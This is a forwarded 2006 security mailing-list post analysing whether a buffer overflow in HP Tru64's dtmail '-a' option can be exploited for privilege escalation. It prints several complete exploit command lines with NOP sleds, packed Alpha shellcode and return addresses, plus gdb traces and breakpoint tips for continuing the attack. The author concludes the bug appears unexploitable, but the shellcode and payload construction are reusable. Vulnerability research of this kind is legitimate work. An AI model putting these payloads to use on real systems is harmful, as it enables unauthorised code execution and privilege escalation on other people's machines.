Vulnerability Development mailing list archives
Fwd: HP Tru64 dtmail bug - Really exploitable?
From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 22 Oct 2006 21:23:40 +0200
Hi, Perhaps somebody with more skills at Tru64 exploitation could comment on this and prove me that I'm wrong / right. Any tip when exploiting Tru64 will be appreciated. Thanks. -- Saludos, -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ]
--- Begin Message --- From: Roman Medina-Heigl Hernandez <roman () rs-labs com>
Date: Sun, 22 Oct 2006 18:08:01 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, I had a look to this bug and it seems NOT to be exploitable. More or less according to HP advisory ("HPSBTU02163 SSRT061223") which marks the impact as POTENTIAL ("Potential Security Impact: Local execution of arbitrary code") but just the opposite to Netragard advisory, which marks the bug as "Effort: Easy". They also gave us to understand that they have an exploit ("proof of concept: undisclosed"). Can somebody at Netregard and/or HP confirm that the bug is truly exploitable (to escalate privileges)? It would be nice to hear from Netregard how did they supposedly exploited this. Really. Analysis and debug info.- ======================= Summary: It is clearly a buffer overflow but we don't have full control of attacking string. The overflowing string is built by concatenating argument passed with "-a" dtmail option, with the fixed string " does not exist.". So it you run: "./dtmail -a AAAAAAAA", the "overflowing string" would be: "AAAAAAAA does not exist." This is a problem, when combined with 64-bits addresses in Alpha, and the fact that this kind of addresses always contains NULLs (typical libc address is 6 bytes, and a stack address uses to be 5 bytes; rest of bytes are null-padded). Let's begin... A first attempt to test the exploitation, could be: ./dtmail -a `perl -e 'print "\x1f\x04\xff\x47"x478 . pack("I*",0x221efc18,0x42061412,0x47f0d411,0xb230fffc,0xb232fffc,0xd21ffffb,0x420e1415,0x42069414,0x43e79413,0xa235fffc,0x42061410,0xa254fffc,0x42609533,0x46510812,0xb254fffc,0x42809414,0xf67ffffa,0x41414141,0xcf497996,0xca8e9c85,0x3d368888,0xcb6a7c88,0x3f768880,0xcf778c98,0x8888880b,0xcf568c99,0xcd258c98,0xcf778c9a,0xcb6ffc88,0x8888880b,0xe1eaa7a7,0xe0fba7e6,0x88888888,0x88888888) . pack("Q", 0x0102030405060708)'` which is: [many NOPs] [Shellcode] [RET] The result seems good: we got execution flow directed to our RET address (0x0102030405060708) *BUT* if you try to land into our shellcode: ./dtmail -a `perl -e 'print "\x1f\x04\xff\x47"x478 . pack("I*",0x221efc18,0x42061412,0x47f0d411,0xb230fffc,0xb232fffc,0xd21ffffb,0x420e1415,0x42069414,0x43e79413,0xa235fffc,0x42061410,0xa254fffc,0x42609533,0x46510812,0xb254fffc,0x42809414,0xf67ffffa,0x41414141,0xcf497996,0xca8e9c85,0x3d368888,0xcb6a7c88,0x3f768880,0xcf778c98,0x8888880b,0xcf568c99,0xcd258c98,0xcf778c9a,0xcb6ffc88,0x8888880b,0xe1eaa7a7,0xe0fba7e6,0x88888888,0x88888888) . pack("Q", 0x11fffe404)'` you'll see RET address is NOT completely correct :-((. Gdb output: alpha> gdb -q --nw dtmail core inst emulated pid=1662 <gdb> va=0x1400f8280 pc=0x12005b708 inst=0x3be00000 (no debugging symbols found)... warning: big endian file does not match little endian target. Core was generated by `dtmail'. Program terminated with signal 11, Segmentation fault. Reading symbols from /sbin/loader...(no debugging symbols found)...done. Loaded symbols for /sbin/loader Reading symbols from /usr/shlib/libXmu.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libXmu.so Reading symbols from /usr/shlib/libDtHelp.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libDtHelp.so Reading symbols from /usr/shlib/libiconv.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libiconv.so Reading symbols from /usr/shlib/libDtSvc.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libDtSvc.so Reading symbols from /usr/shlib/libtt.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libtt.so Reading symbols from /usr/shlib/libcxx.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libcxx.so Reading symbols from /usr/shlib/libDtWidget.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libDtWidget.so Reading symbols from /usr/shlib/libXm.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libXm.so Reading symbols from /usr/shlib/libXt.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libXt.so Reading symbols from /usr/shlib/libSM.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libSM.so Reading symbols from /usr/shlib/libICE.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libICE.so Reading symbols from /usr/shlib/libXext.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libXext.so Reading symbols from /usr/shlib/libX11.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libX11.so Reading symbols from /usr/shlib/libdnet_stub.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libdnet_stub.so Reading symbols from /usr/shlib/libm.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libm.so Reading symbols from /usr/shlib/libexc.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libexc.so Reading symbols from /usr/shlib/libc.so...(no debugging symbols found)...done. Loaded symbols for /usr/shlib/libc.so warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x6f6420011fffe404 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic-fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB. #0 0x6f6420011fffe404 in ?? () (gdb) Do you see what the problem is? Look at the difference: - - attempted RET: 0x000000011fffe404 - - real RET: 0x6f6420011fffe404 The "0x6f6420" portion corresponds to "do " string, which belongs to the string that was automatically added (fixed string): " does not exist.". So we cannot control RET address :-(((( Ways of controlling RET address (so this bug *could* be exploitable): A) Find a useful RET address without NULLs (i.e. a fully 64-bits address). Is this possible? Let me hear from you if you know about it. B) Try to use fixed string to build a valid RET address (not controllable but perhaps useful). Let's try option B. This is the fixed string: " does not exist." (16 bytes + NULL) [ perl -e 'print pack("I*",0x656f6420,0x6f6e2073,0x78652074,0x2e747369)."\x00"' ] RET address is located just after the overflowing string and Alpha is little-endian, so we could try some kind of off-by-one overflow, off-by-two, etc. The original RET address (without overflow) is 0x012008df3c. Using this method we can overwrite least significant bytes (so you can insert bytes from right to left: 0x00, 0x2e, 0x74, 0x73, etc). But the bytes cannot be arbitrarily chosen, they're taken from the fixed string (remember?). I tested this method and only found these valid RET addresses: B1) 0x012008df00 ./dtmail -a `perl -e 'print "\x1f\x04\xff\x47"x474 . pack("I*",0x221efc18,0x42061412,0x47f0d411,0xb230fffc,0xb232fffc,0xd21ffffb,0x420e1415,0x42069414,0x43e79413,0xa235fffc,0x42061410,0xa254fffc,0x42609533,0x46510812,0xb254fffc,0x42809414,0xf67ffffa,0x41414141,0xcf497996,0xca8e9c85,0x3d368888,0xcb6a7c88,0x3f768880,0xcf778c98,0x8888880b,0xcf568c99,0xcd258c98,0xcf778c9a,0xcb6ffc88,0x8888880b,0xe1eaa7a7,0xe0fba7e6,0x88888888,0x88888888)'` B2) 0x012008002e ./dtmail -a `perl -e 'print "A"."\x1f\x04\xff\x47"x474 . pack("I*",0x221efc18,0x42061412,0x47f0d411,0xb230fffc,0xb232fffc,0xd21ffffb,0x420e1415,0x42069414,0x43e79413,0xa235fffc,0x42061410,0xa254fffc,0x42609533,0x46510812,0xb254fffc,0x42809414,0xf67ffffa,0x41414141,0xcf497996,0xca8e9c85,0x3d368888,0xcb6a7c88,0x3f768880,0xcf778c98,0x8888880b,0xcf568c99,0xcd258c98,0xcf778c9a,0xcb6ffc88,0x8888880b,0xe1eaa7a7,0xe0fba7e6,0x88888888,0x88888888)'` I couldn't find a way to gain control of PC following the former RET addresses. I gave it up. :-(((((( If you wanna try for yourself, these are some useful debugging tips/addresses for this bug: * Trace: (gdb) bt #0 0x3ff8013c628 in poll () from /usr/shlib/libc.so #1 0x3ff806a3854 in _XtWaitForSomething () from /usr/shlib/libXt.so #2 0x3ff806a6154 in XtAppProcessEvent () from /usr/shlib/libXt.so #3 0x1200627c4 in post_and_return__15DtMailGenDialogXPc () #4 0x120052d84 in handleErrorDialog__10AttachAreaXPcPcPc () #5 0x120050740 in addAttachment__10AttachAreaXPQ16DtMail7MessagePQ16DtMail8BodyPartPcPc () #6 0x1200b254c in inclAsAttmt__13SendMsgDialogXPcPc () warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x102030405060708 (gdb) * Interesting breakpoints: Breakpoint 3, 0x120052d08 in handleErrorDialog__10AttachAreaXPcPcPc () DIALOG->pulso ok Breakpoint 1, 0x120062804 in post_and_return__15DtMailGenDialogXPc () Breakpoint 4, 0x120052d8c in handleErrorDialog__10AttachAreaXPcPcPc () Breakpoint 8, 0x120050ef8 in addAttachment__10AttachAreaXPQ16DtMail7MessagePQ16DtMail8BodyPartPcPc () Breakpoint 9, 0x1200b2558 in inclAsAttmt__13SendMsgDialogXPcPc () 2: /x $pc = 0x1200b2558 1: /x $ra = 0x102030405060708 In particular, a very interesting address to place a breakpoint in is 0x1200b2558 (which is just the instruction following the reading of return address from the stack). Print the value of RA register and play with it. If you're still here, you are some kind of weirdo!! :-))) PS: Anyway, typical buffer overflows (where you haven't got a fixed and disturbing string at the end, like in this case) in Tru64 *ARE* exploitable, as you all probably know. Cheers, - -Roman PERFECT.MATERIAL escribió:I think my post was moderated anyway due to my overt racism. But, I remember this bug from a while back and I think there was a pointer dereferenced before the function returns (which is common with most of the CDE bugs). The 64 bit pointer is of course 8 bytes of the string you use to smash the buffer, and it requires some NULL bytes which is not possible given the architecture. I was a little unclear about this (actually, completely wrong) but am still fairly confident this bug isn't actually exploitable on TRU64. PERFECT.MATERIAL On 10/20/06, *Roman Medina-Heigl Hernandez* <roman () rs-labs com <mailto:roman () rs-labs com>> wrote: PERFECT.MATERIAL escribió:Correction, TRU64 runs on Alphas in LSB mode. However, this bug isstillnot exploitable. Sorry for the NETRAGARD-like fuckup :DI didn't have time enough to test this, but at first sight it seems perfectly exploitable. Alpha is a "true" 64 bits RISC processor (both data & addressing being 64 bits), little-endian. A typical stack address is something like: 0x000000001ffff530 ( "\x30\xf5\xff\x1f\x01\x00\x00\x00" ) So yes, you have nulls (3, in this case), but at the end of the string :-) You can try a typical string-alike buffer: [ NOPs ... SHELLCODE RET ] (stack variables are just before RET, you have not saved frame pointer stored here) Assuming a typical RET value (like the former one), your exploit should rely on memory being "more or less clean", I mean, at least two nulls (the third one is \0 terminator byte, you can insert it) should be exist in the memory location where the attack string is being copied (well, at the end of the string). Is this difficult? I don't think so (but I don't really know for sure). You can minimize the problem if you use longer RET addreses. For instance, a typical address inside libc functions could be: 0x3ff800f3810 (so you have two nulls, instead of three). You'd have to deal with only one residual null value, instead of two. You can try this with a typical return into libc exploit. This should be also sufficient (and useful) to avoid non-executable stack protection, which is enabled by default in Tru64. Well, that's the theory... :-)- -- Saludos, - -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFFO5dh5H+KferVZ0IRAqUYAJkBukxl+2XSlTiB5e80B0OFnUA+UACeLXX4 F+jeoGD9/lh2x0AzzJ4WNxY= =mHTv -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
--- End Message ---
Current thread:
- Fwd: HP Tru64 dtmail bug - Really exploitable? Roman Medina-Heigl Hernandez (Oct 22)